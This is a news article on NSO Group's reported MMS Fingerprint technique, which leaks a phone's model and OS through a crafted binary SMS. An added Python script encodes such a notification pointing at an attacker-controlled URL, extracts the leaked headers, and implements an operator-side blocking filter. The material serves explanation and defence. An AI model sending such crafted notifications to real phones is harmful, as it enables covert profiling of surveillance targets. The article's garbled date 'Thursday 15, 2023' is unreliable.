NSO Group, an Israeli spyware firm, is suspected of using a novel "MMS Fingerprint" attack to profile unsuspecting targets, exposing their device model and OS version without any user interaction.
Swedish telecom security firm Enea reports that the Israeli NSO Group, which has targeted journalists, human rights activists, lawyers and government officials, had this MMS Fingerprint technique on offer. The technique surfaced in documents from WhatsApp's lawsuit against NSO, but it is distinct from the 2019 WhatsApp exploit: it works over the carrier's MMS signalling path and does not depend on any WhatsApp vulnerability.
According to the report, which the company shared with Hackread.com on Thursday 15, 2023, WhatsApp discovered a vulnerability in its service in May 2019 that allowed attackers to install Pegasus spyware on users' devices. The flaw was exploited to target government officials and activists worldwide. WhatsApp sued NSO Group over that exploitation, and NSO's appeals failed in the US Court of Appeals and the Supreme Court.
The MMS Fingerprint technique, reportedly used by NSO Group, was discovered in a contract between an NSO reseller and the telecom regulator of Ghana, which is among the lawsuit documents (PDF).
Enea investigated how an MMS fingerprint attack works and found that it can reveal the target's device model and OS version without user interaction, using nothing more than a crafted MMS notification sent to the target's phone number.
The MMS UserAgent, a string that identifies the device and OS (for example a Samsung phone running a particular Android version), lets an attacker pick exploits that match the target's software, tailor malicious payloads, or craft convincing phishing campaigns.
Surveillance companies routinely ask for device information, and for this purpose the UserAgent is often more useful than an IMEI: the IMEI identifies a handset, while the UserAgent tells the attacker what software it runs. Note that the MMS UserAgent is distinct from the browser UserAgent, which has attracted privacy scrutiny and has been changed over time; the MMS UserAgent has not received the same attention.
According to Enea's report, the problem is not a flaw in Android, BlackBerry or iOS handsets but in the complex, multi-stage MMS flow itself. Examining that flow suggested the attack is launched not with a conventional MMS but through a binary SMS.
For background: MMS designers needed a way to notify a recipient device that an MMS is waiting without requiring the device to be connected to the data channel. MM1_notification.REQ therefore travels as a binary SMS (a WSP/WAP Push) that tells the recipient's MMS user agent a message is waiting for retrieval.
The device then issues MM1_retrieve.REQ, an HTTP GET to the content URL carried in the notification. That request includes device identification headers, and this is where the MMS fingerprint was suspected to leak.
Researchers obtained SIM cards from a randomly selected Western European operator and successfully sent MM1_notification.REQs (binary SMSs) with the content location set to a URL on a web server they controlled.
The target device fetched the URL automatically, exposing its UserAgent and x-wap-profile headers. A Wireshark decode of the MMS notification and the resulting GET showed how an attacker would execute an "MMS Fingerprint" attack, demonstrating it is practical in real life.
The attack highlights the ongoing threat to the mobile ecosystem. Binary SMS attacks have been reported steadily over the last 20 years, and mobile operators need to evaluate their protection against them.
To defend against the attack, disabling MMS auto-retrieval on the handset helps, though some devices do not expose that setting. On the network side, filtering binary SMS/MM1_notification messages is effective: if a malicious notification is received, the operator should stop the handset from connecting to the attacker-controlled URL it points to.
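As an added example (not code from Enea's report or this article), the following Python script encodes an MM1_notification.REQ the way it travels in a WAP Push binary SMS, decodes it back, shows the two headers that make up the fingerprint in the handset's MM1_retrieve.REQ GET, and implements the network-side filter described above: drop notifications whose content location does not point at the operator's own MMSC. Header codes follow the OMA MMS Encapsulation / WSP encoding; the phone number, URLs, UserAgent string and MMSC hostname are constructed for illustration.

```python
# Added example (not Enea's or Hackread's code): encode and decode an MM1_notification.REQ
# (m-notification-ind) as carried in a WAP Push binary SMS, show what the handset leaks in
# its MM1_retrieve.REQ GET, and apply the network-side filter from the mitigation paragraph.
# Header codes follow the OMA MMS Encapsulation / WSP encoding; every message is constructed.
from urllib.parse import urlparse

MSG_TYPE, TRANSACTION_ID, MMS_VERSION, FROM = 0x8C, 0x98, 0x8D, 0x89   # WSP MMS header codes
MSG_CLASS, MSG_SIZE, EXPIRY, CONTENT_LOCATION = 0x8A, 0x8E, 0x88, 0x83
M_NOTIFICATION_IND, WSP_PUSH = 0x82, 0x06
CT_MMS_MESSAGE = 0xBE                      # application/vnd.wap.mms-message (0x3E | 0x80)
WAP_PUSH_UDH = bytes([0x06, 0x05, 0x04, 0x0B, 0x84, 0x23, 0xF0])  # UDH: dst port 2948, src 9200

def _uintvar(n):                           # WSP variable-length unsigned integer
    out = [n & 0x7F]
    while n := n >> 7:
        out.insert(0, (n & 0x7F) | 0x80)
    return bytes(out)

def _text(s):                              # Text-string: NUL-terminated, 0x7F quote if first byte >= 0x80
    b = s.encode()
    return (b"\x7F" if b[:1] >= b"\x80" else b"") + b + b"\x00"

def _long_int(n):                          # Long-integer: short-length octet then big-endian value
    body = n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")
    return bytes([len(body)]) + body

def build_notification(content_location, size=12345, tx_id="T1", sender="+15550100"):
    """UDH + WSP Push PDU carrying an m-notification-ind whose content location is attacker-chosen."""
    from_val = b"\x80" + _text(sender + "/TYPE=PLMN")       # Address-present-token + address (constructed)
    expiry = b"\x81" + _long_int(86400)                      # Relative-token + one day
    mms = (bytes([MSG_TYPE, M_NOTIFICATION_IND, TRANSACTION_ID]) + _text(tx_id)
           + bytes([MMS_VERSION, 0x90])                      # MMS version 1.0
           + bytes([FROM, len(from_val)]) + from_val         # short-length Value-length (< 31 octets)
           + bytes([MSG_CLASS, 0x80])                        # Personal
           + bytes([MSG_SIZE]) + _long_int(size)
           + bytes([EXPIRY, len(expiry)]) + expiry
           + bytes([CONTENT_LOCATION]) + _text(content_location))
    headers = bytes([CT_MMS_MESSAGE])                        # Content-Type is the only push header
    return WAP_PUSH_UDH + bytes([0x01, WSP_PUSH]) + _uintvar(len(headers)) + headers + mms

def _read_uintvar(b, p):
    n = 0
    while True:
        n, p = (n << 7) | (b[p] & 0x7F), p + 1
        if not b[p - 1] & 0x80:
            return n, p

def parse_notification(sms):
    """Decode a WAP-push-framed m-notification-ind into {header_code: value}; ValueError otherwise."""
    if not sms.startswith(WAP_PUSH_UDH) or sms[len(WAP_PUSH_UDH) + 1] != WSP_PUSH:
        raise ValueError("not a WAP Push binary SMS")
    hdr_len, p = _read_uintvar(sms, len(WAP_PUSH_UDH) + 2)   # skip UDH, transaction id, PDU type
    if sms[p] != CT_MMS_MESSAGE:
        raise ValueError("push is not an MMS message")
    p, fields = p + hdr_len, {}
    while p < len(sms):
        code, p = sms[p], p + 1
        if code in (MSG_TYPE, MMS_VERSION, MSG_CLASS):          # single-octet values
            fields[code], p = sms[p], p + 1
        elif code in (TRANSACTION_ID, CONTENT_LOCATION):        # Text-string
            start = p + 1 if sms[p] == 0x7F else p
            end = sms.index(0, start)
            fields[code], p = sms[start:end].decode(), end + 1
        elif code == MSG_SIZE:                                  # Long-integer
            n = sms[p]
            fields[code], p = int.from_bytes(sms[p + 1:p + 1 + n], "big"), p + 1 + n
        elif code in (FROM, EXPIRY):                            # Value-length prefixed blobs
            n, p = (sms[p], p + 1) if sms[p] <= 30 else _read_uintvar(sms, p + 1)
            fields[code], p = sms[p:p + n], p + n
        else:
            raise ValueError(f"unhandled MMS header 0x{code:02X}")
    return fields

def should_block(sms, operator_mmsc_hosts):
    """Network-side rule from the mitigation: drop notifications whose retrieval URL is not the MMSC."""
    try:
        f = parse_notification(sms)
    except (ValueError, IndexError):
        return False                                            # not an MMS notification; other rules apply
    if f.get(MSG_TYPE) != M_NOTIFICATION_IND:
        return False
    host = urlparse(f.get(CONTENT_LOCATION, "")).hostname or ""
    return host.lower() not in operator_mmsc_hosts

# Constructed MM1_retrieve.REQ as the attacker's web server would log it; device strings are invented
SAMPLE_GET = (b"GET /m/abc123 HTTP/1.1\r\nHost: 198.51.100.7\r\n"
              b"User-Agent: SAMSUNG-SM-G991B/1.0 Android/13 MMS/1.2\r\n"
              b"x-wap-profile: http://wap.samsungmobile.com/uaprof/SM-G991B.xml\r\n"
              b"Accept: */*\r\n\r\n")

def fingerprint_from_get(raw):
    """The two headers that make up the MMS fingerprint, pulled from a raw HTTP request."""
    headers = dict(line.split(":", 1) for line in raw.decode().split("\r\n")[1:] if ":" in line)
    headers = {k.strip().lower(): v.strip() for k, v in headers.items()}
    return {"user_agent": headers.get("user-agent"), "uaprof": headers.get("x-wap-profile")}

if __name__ == "__main__":
    sms = build_notification("http://198.51.100.7/m/abc123")   # attacker-controlled host (constructed)
    print("binary SMS:", sms.hex())
    print("decoded:", parse_notification(sms))
    print("block?", should_block(sms, {"mmsc.example-operator.net"}))
    print("fingerprint:", fingerprint_from_get(SAMPLE_GET))
```

The filter keys on the one thing the attacker must control, the X-Mms-Content-Location URL, rather than on the sender address, which is trivially spoofed on the SS7/SMPP side. An operator deploying it would allowlist its own MMSC hostnames and treat any other destination in an inbound m-notification-ind as hostile; the handset never sees the notification, so it never issues the GET that leaks the UserAgent and x-wap-profile headers.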